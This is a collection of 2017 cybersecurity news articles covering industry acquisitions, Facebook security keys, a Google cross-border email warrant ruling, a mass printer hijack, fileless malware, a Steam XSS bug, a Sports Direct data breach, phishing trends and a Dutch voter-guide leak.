STE WILLIAMS

Sophos buys Invincea to bring next-gen malware protection and machine learning into its product portfolio.

Sophos has agreed to acquire endpoint security firm Invincea for $100M to strengthen its product lineup with new malware protection technology.

Invincea was founded to address zero-day security threats with non-signature-based technologies to protect businesses against advanced threats. Flagship product X by Invincea uses deep learning neural networks and behavioral monitoring to find unknown malware and prevent damage before it hits.

Sophos plans to integrate Invincea’s machine learning technology into its endpoint protection portfolio. Invincea will continue to sell and support its endpoint security portfolio. The separately managed division of Invincea Labs is not part of this acquisition.

“Invincea will strengthen Sophos’ leading next-gen endpoint protection with complementary predictive defenses that we believe will become increasingly important to the future of endpoint protection and allow us to take full advantage of this significant new growth opportunity,” said Sophos CEO Kris Hagerman in a statement.

Read more on the Sophos blog.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: http://www.darkreading.com/endpoint/sophos-acquisition-targets-endpoint-security/d/d-id/1328085?_mc=RSS_DR_EDT

Facebook is among social platforms focusing on security as social media poses a growing risk to individuals and businesses.

Social media poses a silent but deadly risk to organizations as users adopt a generally relaxed approach to sharing personal and corporate data. IT pros are challenged to secure the constant flood of social activity on business networks.

“It’s one of those necessary evils,” says Dr. Amelia Estwick, program manager for the National Cybersecurity Institute at Excelsior College, of social networking. “Now, we can’t imagine our lives without it.”

But social media firms such as Facebook also are raising the bar with security, a move that could ultimately help promote better security practices on its platform. Take Facebook’s announcement last month that it now supports physical keys based on the FIDO U2F security standard for stronger and more secure authentication of user accounts. Users can register keys to their Facebook accounts so when they log in, they tap a device plugged into their computer’s USB port.

Brad Hill, security engineer at Facebook, acknowledges the need for stronger security on social networks and explains the company’s recent efforts to drive change in the industry, specifically for login security and account recovery.

“Security is on everyone’s mind right now, on social media, email, etc.,” he says. “Everyone is looking for ways they can feel more secure in their online identities and the things they do online. We want to continue making security easier.”

Social media’s rampant growth, including that of Facebook, has basically opened the door for malware distribution, social engineering, data mining, and a flood of other security threats. 

Evan Blair, co-founder and chief business officer at social media security firm ZeroFOX, explains how hackers are starting to take advantage: “That fundamental scale has created an interesting opportunity for cybercriminals because they can target or exploit virtually any individual, at any organization around the world,” he continues. “Everyone is available; everyone is accessible on social media.”

People place more trust in their social accounts than they do in email, Blair continues. We’re taught to be wary of emailed links, even from those we trust, but we’re quick to share personally identifiable information or click links on Facebook, Twitter, and Instagram.

“Because we have no baseline security, we’re highly vulnerable to social engineering and spearphishing campaigns,” he says, noting how the human interaction on social media drives users’ trust in platforms. “The amount of information we share makes us a ripe target.”

Companies like Facebook are recognizing the immediate threat to consumers and businesses and launching new initiatives to mitigate risk.

Facebook is a particularly appealing target for threat actors given the scope of its platform, explains Dr. Estwick. “The reason I see Facebook as a bigger problem is the amount of services it provides now,” she says. “On Twitter, you send a tweet. On Facebook, you have Facebook Live, Instagram … I don’t think users understand what they’re getting themselves into when they create a Facebook account.”

Facebook Fights Back

On January 26, Facebook announced its support for physical keys for authentication. Facebook’s Hill explains how the physical keys make accounts “immune to phishing” because users don’t have to enter a code and the hardware provides cryptographic proof that it’s plugged in. While users won’t be required to install them, the keys are an obvious choice for people using social media for businesses.

“There’s no way you can make a mistake,” he says. “Attackers can’t compromise it, you can’t accidentally give your credentials away.”

Further, users can employ the same key for several accounts including Google, Salesforce, Dropbox, and GitHub. Hill hopes by jumping in on this trend, Facebook will encourage users to adopt stronger security measures.

Shortly after it announced U2F security key support, Facebook shared a project with GitHub focused on account recovery. GitHub users can use their Facebook accounts for authentication as part of the GitHub account recovery process.

The idea is to give users an easier and more secure option to recover their accounts. Common methods like recovery emails, SMS messages, and security questions are viewed as both inconvenient and risky as more people go online, Hill says.

Users can set this up by saving an encrypted recovery token with their Facebook account. If they need to recover a GitHub account, they can re-authenticate to Facebook and the token is sent back to GitHub for verification.

“People will always forget their passwords or lose their phones, and we want to make sure they have ways to get into their accounts,” says Hill. “Interconnecting networks offers a better option than centralizing things around one account or security questions. We know that stuff isn’t secure.”

Meantime, social media will continue to be a big target of attackers, ZeroFOX’s Blair says.

“We will see more targeted attacks across social media,” he says. “We already see a ton making headlines, but we’re going to see more hackers targeting employees to gain access to corporate systems. That will continue to become a problem.”

On the enterprise side, collaboration apps like Slack will pose a threat despite their intent to drive productivity. Organizations lack control over critical functions: what information is requested of them, which customers and partners join the app, how they engage.

Each social network will tackle the problem differently. Facebook has already started to ramp up its security game and anticipates other platforms will follow suit, experts say.

“We definitely have a huge audience; everybody uses Facebook,” says Hill. “I think we’re also a player other people in the industry watch. Security-key technology is something the whole industry should be adopting.”

Related Content:

• Cloud Storage The New Favorite Target Of Phishing Attacks
• Fight Back Against Ransomware
• New Method Can Catch Smartphone Thieves In 14 Seconds

Kelly is an associate editor for InformationWeek. She most recently reported on financial tech for Insurance Technology, before which she was a staff writer for InformationWeek and InformationWeek Education. When she’s not catching up on the latest in tech, Kelly enjoys … View Full Bio

Article source: http://www.darkreading.com/vulnerabilities---threats/facebook-aims-to-shape-stronger-security-practices/d/d-id/1328082?_mc=RSS_DR_EDT

Surprising many privacy advocates, US magistrate Judge Thomas Rueter has ruled that Google must turn over email contents demanded by the FBI through a court-approved warrant, even where those contents are stored outside the United States.

Why a surprise? Because a regional US appeals court –  that’s one step below the Supreme Court – had recently heartened them by taking the opposite view in a case involving Microsoft.

In the Microsoft case, involving narcotics trafficking, the US government sought content from emails stored on Microsoft’s servers in Dublin, Ireland. While the official court papers don’t indicate whether the customer was a US citizen, he or she evidently isn’t. A lower court required Microsoft to comply with the government order, and even found it in contempt when it did not do so. A small panel of the appeals court reversed that decision, and by a 4-4 vote, the entire appeals court refused to reconsider.

The facts of the Google case were a bit different. Here, the warrant relates to a US citizen being investigated for fraud committed in the US. Moreover, Google stores email in a complex global cloud of servers, and constantly moves message fragments around to optimize network performance. That means some email may be stored in the US, some partly in the US, some entirely overseas – and the mixture can change dynamically from instant to instant.

In responding to the government’s warrant, Google provided all the emails it knew were located in the US at that moment. But, relying on the recent Microsoft decision, it provided no emails it believed were stored elsewhere. According to Judge Rueter’s decision, that won’t fly: Google needs to provide all of them.

Rueter argued that Google is subject to the “well-established principle that a court’s power to require a person to disclose information applies to all information in that person’s custody or control, regardless of where the information is located” – and this data is solely controlled by Google employees in California. He then performed a complex analysis to determine whether enforcing the subpoena would be “an unlawful extraterritorial application of the 1986 Stored Communication Act,” concluding that it is not.

In his (controversial) view, the data isn’t being “seized” in a foreign country, because “seizure” implies that the user has lost some meaningful aspect of the possession of his property. But Google routinely moves data from and to the US, and users never even notice – simply moving data creates no “meaningful interference with the account owner’s control over his information”. His reasoning continues: the actual search of the email’s contents only happens within the US, so a government warrant for a domestic search is sufficient.

It’s important to understand just how fluid American law is when it comes to these email warrants, and how tenuous the protections that the Microsoft case has seemed to offer.

Unsurprisingly, Google has already announced that it will appeal Rueter’s decision. And it’s only been two weeks since the appeals court denied the government’s request for a rehearing in the Microsoft case by a tied 4-4 vote. The government might still appeal to the US Supreme Court, and given the closeness of the appeals court decision, the Supreme Court might well agree to consider its appeal.

Since the July 2016 Microsoft decision was made by a regional court, it isn’t technically binding nationwide. But many leading service providers have been treating it as if it is, extending greater privacy protections to customers unless forced to do otherwise by another court (as Rueter is attempting to do).

However, one key justice who supported Microsoft in the first case said things would “look rather different… if the American government is demanding from an American company emails of an American citizen resident in the US, which are accessible at the push of a button in [the US] and which are stored on a [foreign] server… solely for reasons of convenience and that could be changed… at the whim of the American company”. That sounds quite a lot like the Google case.

The government has argued that if the Microsoft decision stands, there would be no way for any law enforcement official anywhere to legally access an email that might be stored on a foreign server. It would be “beyond the reach” of a US warrant “even when the account owner resides in the United States and the crime under investigation is entirely domestic”.

And it would be beyond the reach of foreign law enforcement, because non-US law enforcement agencies have no power over the Google employees in California who are the only individuals capable of accessing that content. Rueter notes that, in oral arguments before his court, Google’s attorneys said the only way the government could get this data was to “work to reform” the 1986 law these warrants are based on.

Many observers do think that law is obsolete in the era of cloud computing, and do expect Congress to revise it. Meanwhile, of course, the US administration has changed; and while Donald Trump’s incoming attorney-general Jeff Sessions hasn’t yet said whether he’ll appeal, he has said that Congress should change the law so the Microsoft decision doesn’t stand.

Needless to say, the American privacy and technology communities are closely watching what happens next in both the Google and Microsoft cases. But so are foreigners – many of whom are already concerned about the privacy of cloud services whose data is controlled by US companies.

Follow @NakedSecurity
Follow @BillCamarda

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/V7buLUjZGuw/

If your printer unexpectedly output a strange message over the weekend in the IBM Courier typeface complete with an ASCII-generated image of a robot, then you weren’t alone.

It seems that the owners of up to 150,000 printers around the world received the same message:

Stackoverflowin has returned to his glory,  your printer is part of a botnet, the god has returned, everyone likes a meme, fix your bulls***… For the love of God, please close this port, skid.

Over a period of 24 hours, slightly different versions of the same message emerged from printers made by manufacturers including HP, Brother, Dell, Canon, Samsung, Epson, Lexmark, Oki and Ricoh.

The culprit, Stackoverflowin, wasn’t exactly trying to hide himself, helpfully signing off the document with contact email and Twitter handles (the latter now suspended).

The issue of printer security – or the lack of it – has been bubbling under for years. Only days ago, as reported in Naked Security, German researchers published the results of tests they had carried out to assess security on a cross-section of office networked printers.

Among a clutch of security problems they uncovered were several ways to exploit access to networked printers through what is termed RAW printing on port 9100.

Popularised by HP’s JetDirect in the 1990s, port 9100 was configured for remote maintenance by admins, although it can also be used to print.  Other examples of direct access include the Internet Printing Protocol on port 631, and the old Unix Line Printer Daemon (LDP) on port 515.

Why so many confusing ways to connect to printers? Mostly, it’s to do with history and manufacturers coming up with their own way to do things which have accumulated over time. It’s easy to forget that printers have been around for decades.

In an email interview, Stackoverflowin said the attack was executed using scripts targeting these direct ports, while Dell printers were hit with an exploit for a remote code execution vulnerability.

Obviously there’s no botnet. People have done this in the past and sent racist flyers etc. I’m not about that, I’m about helping people to fix their problem, but having a bit of fun at the same time ; ) Everyone’s been cool about it and thanked me to be honest.

The “racist flyers” incident refers to an attack last March in which printers at US universities spewed Nazi propaganda after infamous hacker Weev researched easy targets on Shodan.

Given this history of incidents, what can be done to defend networked printers?

A target list of 150,000 is small compared to the world population of printers, which must run to a billion or more. The attacks are warnings, but still quite small ones.

Nevertheless, a troubling minority of internet-accessible and networked printers clearly haven’t been secured via their management interfaces, possibly because they are not seen as vulnerable. For an external attacker to reach a networked printer on port 9100, 631 or 515, something has also gone skew-whiff at the firewall level.

Meanwhile, is your printer potentially vulnerable? Every printer is different, so do check your specific model, but

• The affected printers are all networked models – and that could well include wireless printers
• If your printer has built-in management, make sure you’ve properly secured it from remote access – starting with changing the default password
• Make sure your firewall is properly configured
• Don’t leave your printer switched on if you’re not using it

It does serve as a reminder that the old box in the corner is not just another harmless printing workhorse. Poorly configured, a printer can be an inky route into anyone’s home or business.

Follow @NakedSecurity
Follow @JohnEDunn

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/EepUbSI1gi0/

Sophos has announced a deal to acquire the core technologies of anti-malware protection outfit Invincea for $100m plus up to $20m, dependent on first-year revenues.

Invincea makes a line of signature-less endpoint procession technologies that rely on machine learning and behavioural monitoring to block malware.

Sophos plans to integrate Invincea’s tech into the Sophos Central endpoint product line, before releasing revamped products later his year. The plan parallels the integration of SurfRight’s technology into Sophos’s product line following a smaller December 2015 acquisition.

In the 12 months to 31 March 2016, Invincea recorded billings of $13.4m, revenue of $9.8m and a loss before tax of $11.8m.

Invincea Labs, a division of Invincea that has been separately managed and operated since 2010, will be spun out prior to the acquisition and does not form part of this transaction.

Sophos expects to complete the acquisition around the end of this fiscal year. It anticipates the deal to be “broadly neutral” to its balance sheet in its first year before adding to its revenues thereafter.

Sophos CEO Kris Hagerman commented: “Invincea is leading the market in machine learning-based threat detection with the combination of superior detection rates and minimal false positives. Invincea will strengthen Sophos’s leading next-gen endpoint protection with complementary predictive defences that we believe will become increasingly important to the future of endpoint protection and allow us to take full advantage of this significant new growth opportunity.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/02/08/sophos_invincea/

Cybercriminals have hit scores of enterprises in 40 countries using hidden malware.

Banks, telecommunication companies and government organisations in the US, South America, Europe and Africa have already been hit by the ongoing (and stealthy) attacks.

Kaspersky Lab experts report that the attacks harness widely available penetration-testing and administration tools as well as the PowerShell framework for task automation in Windows. Malicious code resides only in memory, they say.

Hackers behind the attack have apparently taken pains to avoid writing files onto the hard drive of compromised PCs, a tactic designed to foil both whitelisting technologies and post-breach forensic analysis. The crooks are using anti-forensic techniques uncommon in everyday assaults.

“The attackers stay around just long enough to gather information before their traces are wiped from the system on the first reboot,” according to Kaspersky Lab boffins.

Kaspersky Lab experts were set on the trail on the malware campaign by “banks in CIS which had found the penetration-testing software, Meterpreter, now often used for malicious purposes, in the memory of their servers when it was not supposed to be there”. The Meterpreter code was combined with a number of legitimate PowerShell scripts and other utilities. The combined tools had been adapted into malicious code that could hide in the memory, invisibly collecting the passwords of system administrators.

The ultimate goal of the attack appears to be access to financial processes. Kaspersky Lab subsequently discovered that the same types of attack were occurring on an industrial scale worldwide, hitting more than 140 enterprise networks in a range of business sectors, with most victims located in the US, France, Ecuador, Kenya, the UK and Russia.

It’s unclear who is behind the attacks. “The use of open source exploit code, common Windows utilities and unknown domains makes it almost impossible to determine the group responsible – or even whether it is a single group or several groups sharing the same tools,” according to Kaspersky Lab.

Known groups that have the most similar approaches are GCMAN and Carbanak, who therefore both count as suspects.

Details of the second part of the operation, showing how the attackers implemented unique tactics to withdraw money through ATMs are due to be presented at Kaspersky Lab’s Security Analyst Summit in April. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/02/08/hidden_malware_menaces_enterprises/

Security researchers have discovered a significant security vulnerability in Steam, Valve’s digital distribution platform for PC gaming.

The bug, which has since been patched, allowed users to add malicious code to their profile, bypassing Steam’s security measures. The trick, discovered by security researcher cra0kalo, could have been used to redirect victims to a phishing website or a page loaded with malware, among other exploits.

El Reg invited Valve to comment on the vulnerability, but we’re yet to hear back and will update this story when we learn more.

Valve has a history of cross-site scripting (XSS) problems, as internet security watchers have been quick to note, and this one is more serious than most. The gaming platform needs to go to the next level on security in response to heightened threats.

Daniel Miessler, director of advisory services at ethical hacking firm IOActive, commented: “Video games have become mainstream, and along with that popularity has come insecurity. The XSS attack against Steam is an oldie but a goodie, known as persistent XSS. It’s called persistent because the attacker makes a change to something relatively static, like a profile, and then anyone who visits that page gets the payload. This is the same type of attack that took down MySpace back in the day.”

Miessler helped develop the new OWASP Game Security Framework. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/02/08/steam_vulnerability/

Exclusive Sports Direct has left its 30,000-strong workforce in the dark over a data breach in the autumn when a hacker accessed internal systems containing staffers’ personal information.

The Register can reveal the UK’s largest sports retail business was the subject of a digital break-in during September, when an attacker exploited public vulnerabilities affecting the unpatched version of the DNN platform that Sports Direct was using to run a staff portal.

An inside source with knowledge of the incident told The Register that employees’ unencrypted data was stolen during the breach. Sports Direct’s internal systems detected the intrusion in September, but it was not until December that the company learned of the data breach. Our insider claimed a phone number had been left on the company’s internal site with a message encouraging Sports Direct’s bosses to make contact.

Sources told us that as of Monday, staff had still not been notified of the breach, which included names, email and postal addresses, as well as phone numbers.

Sports Direct filed an incident report with the Information Commissioner’s Office after it became aware that its workforce’s information had been compromised, but as there was no evidence that the hacker had made further copies or shared the data, the company did not report the breach to its staff.

A spokesperson for the ICO confirmed to The Register that it was “aware of an incident from 2016 involving Sports Direct” and would be “be making enquiries.”

Last year, a Parliamentary inquiry into working practices at Sports Direct [PDF] described the business as “the country’s largest sports retail outlet,” and stated that its “size and success is founded on a business model that enables the majority of workers in both the warehouse at Shirebrook and at the shops around the UK to be treated without dignity or respect.”

Regarding the breach, Unite assistant general secretary Steve Turner told us: “Sports Direct workers will be anxious to know what personal details have been hacked in this apparently serious data breach and why they weren’t immediately informed about it by their employer. This is potentially sensitive and personal information.”

“It’s completely unacceptable that the workers affected appear not to have been informed and the data breach swept under the carpet,” added Turner.

“We will be immediately approaching the company for answers and further details about the potentially damaging impact of this on our members, as well as details about actions taken to ensure personal data is never compromised again,” the union’s assistant general secretary said. “In the meantime we would urge Sports Direct workers to check their financial records, change passwords and immediately report any suspicious activity.”

Unite’s criticism of Sports Direct’s lack of regard for employees is the latest in a string of complaints which have seen the company’s share price more than halve since February 2015, following a number of scandals regarding its alleged mistreatment of employees.

An undercover investigation by The Guardian discovered that the company had been effectively paying workers below the minimum wage. The company subsequently admitted breaking the law and thousands of warehouse workers received back pay totalling £1m.

In November, six MPs from Parliament’s Business and Skills Committee claimed that “an attempt was made to record their private discussions” when they visited the Shirebrook warehouse to investigate working practices.

A spokesman for Sports Direct said: “We cannot comment on operational matters in relation to cyber-security for obvious reasons. However, it is our policy to continually upgrade and improve our systems, and where appropriate we keep the relevant authorities informed.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/02/08/sports_direct_fails_to_inform_staff_over_hack_and_data_breach/

2016 data shows that phishing scams involving brands like Google and DropBox will soon overtake scams involving financial companies, PhishLabs says.

For all the sophisticated tactics, techniques, and procedures employed by threat actors these days, phishing continued to be the top attack vector in 2016, as it has been for some time.

The big difference was that instead of targeting financial services companies, phishers increasingly targeted cloud storage service providers like Google and DropBox, security vendor PhishLabs said in a voluminous report on phishing trends released this week.

Compared to 2013, when barely 10% of phishing attacks targeted cloud storage services, about 22.5% of phishing attacks last year involved such companies. That was just barely below the 23% of phishing scams involving financial brands, the company noted. What that means is that users are likely going to get more phishing emails this year trying to get them to part with credentials to their cloud storage credentials.

“Over the last four years, the number of phishing attacks targeting cloud storage services has skyrocketed,” says Crane Hassold, senior security threat researcher at PhishLabs. “Based on recent trends, it is likely that phishing attacks targeting cloud storage services will overtake financial institutions as the top target for phishers in 2017.”

So far at least, almost all phishing attacks impacting this industry have involved only Google and DropBox.

Many of the phishing campaigns targeting cloud storage providers contain lures saying that a document or picture has been shared with the victim and encourage them to sign in to their account in order to view it.  

A majority of the phishing pages involved in such campaigns have really been poor duplicates of the pages used by Google, DropBox, and other legitimate sites. Even so, “based on the growing popularity of these types of attacks, phishers must still be having success compromising victim even with this lack of authenticity,” Hassold says.

The PhishLabs report is based on an analysis of some one million confirmed phishing sites spread across more than 170,000 unique domains, and also from the company’s handling of more than 7,800 phishing attacks per month in 2016. The analysis showed an alarming increase across the board in phishing-related activities. 

The number of phishing sites in 2016, for instance, was 23% higher than the year before, while the volume of phishing emails grew by an average of 33% across financial services, cloud storage/file hosting, webmail/online, payment services, and ecommerce sites.

PhishLabs identified a total of 976 brands belonging to 568 organizations that cybercrminals used in phishing campaigns last year.  

The kind of data that phishers went after also broadened considerably last year. In addition to account credentials and personal data, phishers also used their phishing lures to try and snag financial, employment, and account security data like answers to challenge/response questions and mother’s maiden name.

Ransomware’s Best Friend

In 2016, phishing also continued to be by far the most prevalent method for delivering ransomware on everything from end user systems to systems belonging to businesses, government agencies, schools, and critical infrastructure targets.

Driving the surge in phishing-related threats in 2016 was the broad acceptance of email addresses as the username by a growing number of websites.

The use of email as an authentication measure made it easier for phishers to mass-harvest credentials for all email services on a single phishing site, instead of having to target email providers individually, Hassold says.

“Additionally, because a growing number of Web services are using email as a primary credential, phishers are able to multiply their profits by conducting password reuse attacks against these unsuspecting targets,” he says.

The easy availability of phish kits, or ready-to-use templates for creating working phishing sites, contributed to the problem. PhishLabs counted more than 29,000 unique phish kits with templates for spoofing the websites of over 300 companies. Many of these kits included sophisticated anti-detection mechanisms. Mechanisms included access control measures based on IP address, HTTP referrer, and hostname, whitelists, and blocklists.

“The big takeaway is that we’ve created ideal conditions for the mass harvesting of credentials via phishing attacks,” Hassold notes.

Unlike in the past where phishers were focused on immediate gains—by going after and selling access to financial accounts for instance—they are now trying to maximize the information they can compromise with the least effort.

The goal is to “sell the information for a higher price on the underground market or use the information to attack secondary targets, thus multiplying their gains,” Hassold says.

Related Content:

• Dangerous New Gmail Phishing Attack Gaining Steam
• 91% Of Cyberattacks Start With A Phishing Email
• Phishing Can Leverage Users To Bypass Sandboxes
• The Limitations Of Phishing Education 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: http://www.darkreading.com/attacks-breaches/cloud-storage-the-new-favorite-target-of-phishing-attacks/d/d-id/1328078?_mc=RSS_DR_EDT

StemWijzer fixes vulnerabilities after researcher discovers website is secretly maintaining voter-preference record.

A data leak from StemWijzer, a Dutch voter guide website, has raised questions about its intentions and whether it is quietly conducting popularity polls and infringing upon voters’ privacy, Reuters reports. Security researcher Loran Kloeze discovered that a record of voters’ preference was being maintained by the site, which could potentially influence trends ahead of the March 15 elections in the Netherlands.

Anita de Jong of website designer ProDemos said vulnerabilities pointed out by Kloeze had been resolved and clarified the intention was not to offer voting advice but only to educate voters.

StemWijzer requires a site visitor to answer 30 questions and then tells him which political party matches his views the best. The leaked data currently places Labour Party in the second place after Party for Freedom even though opinion polls do not reflect this.

Countries going to the polls this year are working overtime to address cybersecurity concerns, following multiple hacking incidents during the US presidential election last year.

For the full story, read Reuters.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: http://www.darkreading.com/attacks-breaches/dutch-voter-guide-website-leak-highlights-privacy-concerns/d/d-id/1328080?_mc=RSS_DR_EDT